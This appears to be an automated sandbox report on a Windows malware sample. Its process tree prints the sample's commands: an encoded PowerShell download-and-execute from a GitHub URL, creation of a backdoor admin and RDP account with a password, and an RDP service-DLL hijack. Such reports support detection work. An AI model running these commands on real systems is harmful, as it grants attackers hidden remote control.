Analysis
max time kernel: 128s
max time network: 116s
platform: windows7_x64
resource: win7v20201028
submitted: 09-11-2020 20:56

Static task: static1
Behavioral task: behavioral1
  Sample: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
  Resource: win10v20201028

General
Target: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
Size: 3.4MB
MD5: 442016bf1c6123cc40ff23c3637396c0
SHA1: cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
SHA256: 22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
SHA512: d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727

Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (10 IoCs)
Processes:
flow | pid  | process
6    | 1052 | powershell.exe
8    | 1052 | powershell.exe
10   | 1052 | powershell.exe
11   | 1052 | powershell.exe
13   | 1052 | powershell.exe
15   | 1052 | powershell.exe
17   | 1052 | powershell.exe
19   | 1052 | powershell.exe
21   | 1052 | powershell.exe
23   | 1052 | powershell.exe

Modifies RDP port number used by Windows (1 TTPs)

Possible privilege escalation attempt (8 IoCs)
Processes:
pid  | process
1336 | icacls.exe
2028 | takeown.exe
672  | icacls.exe
916  | icacls.exe
1684 | icacls.exe
1664 | icacls.exe
1600 | icacls.exe
1596 | icacls.exe

Sets DLL path for service in the registry (2 TTPs)

Processes:
resource                       | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx

Deletes itself (1 IoCs)
Processes:
pid  | process
1236 | powershell.exe

Loads dropped DLL (2 IoCs)
Processes:
pid  | process
1184 |
1184 |

Modifies file permissions (1 TTPs, 8 IoCs)
Processes:
pid  | process
916  | icacls.exe
1684 | icacls.exe
1664 | icacls.exe
1600 | icacls.exe
1596 | icacls.exe
1336 | icacls.exe
2028 | takeown.exe
672  | icacls.exe

Drops file in System32 directory (1 IoCs)
Processes:
description  | ioc                            | process
File created | C:\Windows\system32\rfxvmt.dll | powershell.exe

Modifies service (2 TTPs, 2 IoCs)
Processes:
description     | ioc                                                                                                                           | process
Key created     | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters                                                        | reg.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"   | reg.exe

Drops file in Windows directory (41 IoCs)

Modifies data under HKEY_USERS (60 IoCs)

Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
description            | flow | ioc
HTTP User-Agent header | 11   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 13   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 15   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 10   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes:
pid  | process
1236 | powershell.exe
1236 | powershell.exe
1236 | powershell.exe
1236 | powershell.exe
1236 | powershell.exe
1052 | powershell.exe
1052 | powershell.exe

Suspicious behavior: LoadsDriver (5 IoCs)
Processes:
pid  | process
464  |
1184 |
1184 |
1184 |
1184 |

Suspicious use of AdjustPrivilegeToken (15 IoCs)
Processes:
description                          | pid  | process
Token: SeDebugPrivilege              | 1236 | powershell.exe
Token: SeRestorePrivilege            | 916  | icacls.exe
Token: SeAssignPrimaryTokenPrivilege | 1952 | WMIC.exe
Token: SeIncreaseQuotaPrivilege      | 1952 | WMIC.exe
Token: SeAuditPrivilege              | 1952 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1952 | WMIC.exe
Token: SeIncreaseQuotaPrivilege      | 1952 | WMIC.exe
Token: SeAuditPrivilege              | 1952 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1224 | WMIC.exe
Token: SeIncreaseQuotaPrivilege      | 1224 | WMIC.exe
Token: SeAuditPrivilege              | 1224 | WMIC.exe
Token: SeAssignPrimaryTokenPrivilege | 1224 | WMIC.exe
Token: SeIncreaseQuotaPrivilege      | 1224 | WMIC.exe
Token: SeAuditPrivilege              | 1224 | WMIC.exe
Token: SeDebugPrivilege              | 1052 | powershell.exe

Suspicious use of WriteProcessMemory (127 IoCs)

Processes
Bracketed numbers give each process's nesting depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES313E.tmp" "c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMP"
    [3] C:\Windows\system32\takeown.exe
        cmdline: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin Ghasar4f5 /del
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin Ghasar4f5 /del
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin ibcLpLqB /add
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin ibcLpLqB /add
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin ibcLpLqB /add
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" updwin /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin ibcLpLqB
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin ibcLpLqB
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin ibcLpLqB
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blacklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES313E.tmpMD5
7261a708ffd78e9400bf926ba35534c7
SHA1a60419a32f6cec0de56c38368b50c12bd16220c1
SHA256b566074992bb2400ef0b048eb1dd1ba059d9b9d8c7eecc20f4c3deddb270c109
SHA512200059a6122f7076057846046ec29523c605dce58eaa3b85817d9f034ec0f2762ad8ca8764fa80b5de8abbabf1334e76dcec3ffb0176bb2637a2a59e6b563fd2
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.dllMD5
0c490ce7a6b73184b0b5278f5aacaf2c
SHA1893c5880833f6a4885dba15d51e909f95f340e71
SHA256615dc4c71aba291d2ced322a4d555deff513ac9b741eb6b66fd8851b47b74e63
SHA512a5b7d691e0f5bf512b6a0d6f9cc1069165bc70f5c088d09be54105e62df94ce39b589cda02cbef0cbee9e64322ede5076d2a6f5eafb757ad072091ba3769199d
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMP
MD5 93287916571b71592295cb7840532dc5
SHA1 b37054cf6ed6020c3e2ca74d7757b533f0e6f4e5
SHA256 c39d3257eb57ef618753aa7d8119b0bb7b3bd786e080124c13878c0708f9ae56
SHA512 cf199e14ea79734b31f02f6b29be7c304a6cc67dbfd9b2fdb0f8ff66d8c9a8ebfb3e677b5394c87107ca0018921ca9560c78f5e9781cedafacf543eeced47e31
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.0.cs
MD5 6f235215132cdebacd0f793fe970d0e3
SHA1 2841e44c387ed3b6f293611992f1508fe9b55b89
SHA256 ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512 a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdline
MD5 8f50ff5ccaa6bfc250371e26fcd4fc92
SHA1 9b9eb412509f63b1d6448dafe15f6297ad55095a
SHA256 3aae583b0baf4a5afd0eff5915df89def228a9a845da6e5f901132a2e42941c1
SHA512 ecd24e3c9b79ef2dfcf8bafe9be746af3d6374df409c7cd98bb6bdd746bfc0aa06eba7ccebe3ff8e3cd72e1089bbad9f00e62566186a19c777bbb4e91817aa2e
-
\Windows\Branding\mediasrv.png
MD5 eeb448ea2709c57b9ea2e223d0c79396
SHA1 38331dd027386151ee37a29a7820570a76427b02
SHA256 c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512 c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.png
MD5 bb873bd05a47f502ee4ed3c4ea749a4f
SHA1 e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256 a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512 ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/292-76-0x0000000000000000-mapping.dmp
-
memory/300-10-0x0000000000000000-mapping.dmp
-
memory/392-67-0x0000000000000000-mapping.dmp
-
memory/460-66-0x0000000000000000-mapping.dmp
-
memory/476-46-0x0000000000000000-mapping.dmp
-
memory/540-53-0x0000000000000000-mapping.dmp
-
memory/672-39-0x0000000000000000-mapping.dmp
-
memory/812-57-0x0000000000000000-mapping.dmp
-
memory/880-88-0x0000000000000000-mapping.dmp
-
memory/880-48-0x0000000000000000-mapping.dmp
-
memory/916-72-0x0000000000000000-mapping.dmp
-
memory/916-40-0x0000000000000000-mapping.dmp
-
memory/980-80-0x0000000000000000-mapping.dmp
-
memory/980-49-0x0000000000000000-mapping.dmp
-
memory/1000-56-0x0000000000000000-mapping.dmp
-
memory/1052-100-0x0000000001320000-0x0000000001321000-memory.dmp
Filesize 4KB
-
memory/1052-109-0x0000000019F20000-0x0000000019F21000-memory.dmp
Filesize 4KB
-
memory/1052-82-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp
Filesize 9.9MB
-
memory/1052-101-0x00000000193D0000-0x00000000193D1000-memory.dmp
Filesize 4KB
-
memory/1052-108-0x00000000193C0000-0x00000000193C1000-memory.dmp
Filesize 4KB
-
memory/1052-98-0x0000000001290000-0x0000000001291000-memory.dmp
Filesize 4KB
-
memory/1052-97-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
Filesize 4KB
-
memory/1052-99-0x00000000193B0000-0x00000000193B1000-memory.dmp
Filesize 4KB
-
memory/1052-116-0x00000000194A0000-0x00000000194A1000-memory.dmp
Filesize 4KB
-
memory/1052-64-0x0000000000000000-mapping.dmp
-
memory/1052-92-0x0000000000F80000-0x0000000000F81000-memory.dmp
Filesize 4KB
-
memory/1052-81-0x0000000000000000-mapping.dmp
-
memory/1052-117-0x000000001AC10000-0x000000001AC11000-memory.dmp
Filesize 4KB
-
memory/1164-63-0x0000000000000000-mapping.dmp
-
memory/1224-79-0x0000000000000000-mapping.dmp
-
memory/1236-33-0x0000000001F70000-0x0000000001F71000-memory.dmp
Filesize 4KB
-
memory/1236-17-0x00000000023D0000-0x00000000023D1000-memory.dmp
Filesize 4KB
-
memory/1236-2-0x0000000000000000-mapping.dmp
-
memory/1236-3-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp
Filesize 9.9MB
-
memory/1236-4-0x0000000001FB0000-0x0000000001FB1000-memory.dmp
Filesize 4KB
-
memory/1236-5-0x000000001ADA0000-0x000000001ADA1000-memory.dmp
Filesize 4KB
-
memory/1236-6-0x00000000024F0000-0x00000000024F1000-memory.dmp
Filesize 4KB
-
memory/1236-7-0x0000000001D40000-0x0000000001D41000-memory.dmp
Filesize 4KB
-
memory/1236-9-0x000000001C3C0000-0x000000001C3C1000-memory.dmp
Filesize 4KB
-
memory/1236-18-0x0000000002760000-0x0000000002761000-memory.dmp
Filesize 4KB
-
memory/1236-21-0x000000001AB00000-0x000000001AB01000-memory.dmp
Filesize 4KB
-
memory/1236-34-0x0000000001F80000-0x0000000001F81000-memory.dmp
Filesize 4KB
-
memory/1236-35-0x000000001B8D0000-0x000000001B8D1000-memory.dmp
Filesize 4KB
-
memory/1236-38-0x0000000001F40000-0x0000000001F50000-memory.dmp
Filesize 64KB
-
memory/1336-45-0x0000000000000000-mapping.dmp
-
memory/1376-47-0x0000000000000000-mapping.dmp
-
memory/1440-55-0x0000000000000000-mapping.dmp
-
memory/1444-54-0x0000000000000000-mapping.dmp
-
memory/1540-70-0x0000000000000000-mapping.dmp
-
memory/1572-58-0x0000000000000000-mapping.dmp
-
memory/1596-44-0x0000000000000000-mapping.dmp
-
memory/1600-43-0x0000000000000000-mapping.dmp
-
memory/1600-75-0x0000000000000000-mapping.dmp
-
memory/1604-61-0x0000000000000000-mapping.dmp
-
memory/1620-73-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1664-42-0x0000000000000000-mapping.dmp
-
memory/1684-41-0x0000000000000000-mapping.dmp
-
memory/1692-13-0x0000000000000000-mapping.dmp
-
memory/1692-50-0x0000000000000000-mapping.dmp
-
memory/1700-0-0x00000000010F0000-0x000000000142D000-memory.dmp
Filesize 3.2MB
-
memory/1700-1-0x0000000001430000-0x0000000001441000-memory.dmp
Filesize 68KB
-
memory/1724-62-0x0000000000000000-mapping.dmp
-
memory/1912-51-0x0000000000000000-mapping.dmp
-
memory/1912-69-0x0000000000000000-mapping.dmp
-
memory/1952-78-0x0000000000000000-mapping.dmp
-
memory/1952-87-0x0000000000000000-mapping.dmp
-
memory/2028-36-0x0000000000000000-mapping.dmp